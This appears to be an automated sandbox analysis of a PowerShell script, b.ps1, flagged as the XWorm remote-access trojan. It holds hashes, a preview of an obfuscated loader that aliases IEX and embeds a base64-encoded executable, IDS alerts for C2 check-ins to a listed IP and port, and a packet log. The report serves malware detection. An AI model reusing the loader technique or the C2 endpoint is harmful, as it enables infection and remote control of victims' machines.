SHA-512: | 974B8F2D443321242BB132E876A6EB812BE562F72DC8D6C886DDC739DDC325AB4387B65142D81DAECCF0A95C7553EAB8B2914B990214261FEE0278EF09EE08CF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.425858083576356 |
Encrypted: | false |
SSDEEP: | 6144:4Svfpi6ceLP/9skLmb0OTlWSPHaJG8nAgeMZMMhA2fX4WABlEnNX0uhiTw:DvloTlW+EZMM6DFy103w |
MD5: | 5C62D2A5872D1008568312556F88F772 |
SHA1: | 5971CC9F1AAAB81B284C5F5E945F7527273FFD38 |
SHA-256: | D771BA9B6410D4183099D9CDC4AB33FDFD74D0E110AF4F47024E3D02E89F3900 |
SHA-512: | D2FC6314530860521EAEB3D17BE7C6EC9F690D13569B4E15166DB059F401098CDA3793DA5EAD10219E6CAEAF9E67CB7D042B62E8310E05ECB748C16559358919 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.2108360392533335 |
TrID: | |
File name: | b.ps1 |
File size: | 185'580 bytes |
MD5: | b5008db49b4ac5e668451b9a34ce2b76 |
SHA1: | 820ebe8c35bf4c57e1e439e4b10cee8186c444d3 |
SHA256: | 7367d1b56aca0b585cef8466d8d9a83dac03f0e6d81f9e89567c10a2cc44a4bc |
SHA512: | 43e8929ec5f728ee53f9a2b378f1949a789ac1e0a92fea559541444b39a3ca8da9911751bda6d37d30831f60af8b0356c4294b695de303cdd076c7c9b550c754 |
SSDEEP: | 3072:ZcUKZ20H5qt7ABLmYOlba6c5GdOa7MQrq3v0ayW3sfc4xDAmMz/zlZVdtj0QGTgn:ZcB20H5qt7ABLmYOlba6c5GdOa7MQrq/ |
TLSH: | CA047C321102BC8E9F7F3E48A5042D911CDC3877AB69C158FAC60AAD75EA650DF39DB4 |
File Content Preview: | .... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFOelGcAAAAAAAAAAOAALiELATAAACABAAAkAQAAAAAAEj8BAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQA |
Icon Hash: | 3270d6baae77db44 |
Download Network PCAP: filtered – full
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:34:28.544276+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:28.769948+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:28.814226+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:36.918088+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:36.918088+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:40.555436+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:40.558655+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:52.350845+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:52.357325+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:04.163753+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:04.166179+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:06.917867+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:15.963703+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:15.967787+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:25.653662+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:25.655476+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:25.854717+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:25.864086+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:26.619507+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:26.643517+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:31.488042+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:31.490610+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:31.901153+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:31.946435+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:36.906588+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:41.125293+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:41.127120+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:52.921008+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:52.923666+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:56.558294+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:56.564382+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.438235+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.442442+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.562563+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.564213+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.688443+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.689951+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.811883+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.820321+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.934237+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.942247+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:06.915056+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.851433+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.857621+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:08.974394+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.976077+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:09.104641+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:09.106351+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:09.576639+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:09.578400+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:22.254524+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.255919+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.256062+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.256207+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.257763+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:22.472568+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.474521+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:24.180863+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:24.397558+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:24.399249+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:34.555246+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:34.559337+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:35.219704+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:35.221750+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:36.902304+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:47.007422+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:47.011390+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:58.808052+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:58.809874+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:04.368257+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:04.373284+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:06.917682+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:07.432087+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:07.434211+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:11.273258+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:11.275725+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:23.070700+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:23.204297+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:31.646275+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:31.648147+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:31.767760+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:31.769145+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:36.936336+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:43.523152+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:43.537690+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 26, 2025 10:34:16.473707914 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:16.478557110 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:16.478660107 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:16.746017933 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:16.750857115 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:28.544275999 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:28.549175978 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:28.769948006 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:28.814225912 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:28.819127083 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:36.918087959 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:36.961432934 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:40.337477922 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:40.342442036 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:40.555435896 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:40.558655024 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:40.563498974 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:52.133903980 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:52.138974905 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:52.350845098 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:52.357325077 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:52.362904072 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:03.930773973 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:03.937963009 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:04.163753033 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:04.166178942 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:04.171386003 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:06.917866945 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:06.961540937 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:15.727806091 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:15.732698917 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:15.963702917 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:15.967787027 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:15.972578049 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.430901051 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:25.435942888 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.633748055 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:25.638618946 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.653661966 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.655476093 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:25.706727028 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.854717016 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.864085913 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:25.868936062 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:26.383768082 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:26.388530970 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:26.619507074 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:26.643517017 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:26.648304939 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.258878946 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:31.263725042 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.488042116 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.490609884 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:31.495409012 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.508718014 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:31.513504982 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.901153088 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.946434975 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:31.951338053 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:36.906588078 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:36.961664915 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:40.899533987 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:40.904432058 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:41.125293016 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:41.127120018 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:41.133542061 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:52.698976040 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:52.704044104 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:52.921008110 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:52.923666000 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:52.928633928 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:56.337096930 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:56.342314959 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:56.558294058 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:56.564382076 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:56.569220066 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.212090015 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.217067003 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.321516991 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.326473951 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.352952003 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.357848883 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.415560007 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.420509100 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.438235044 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.442441940 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.490748882 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.524586916 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
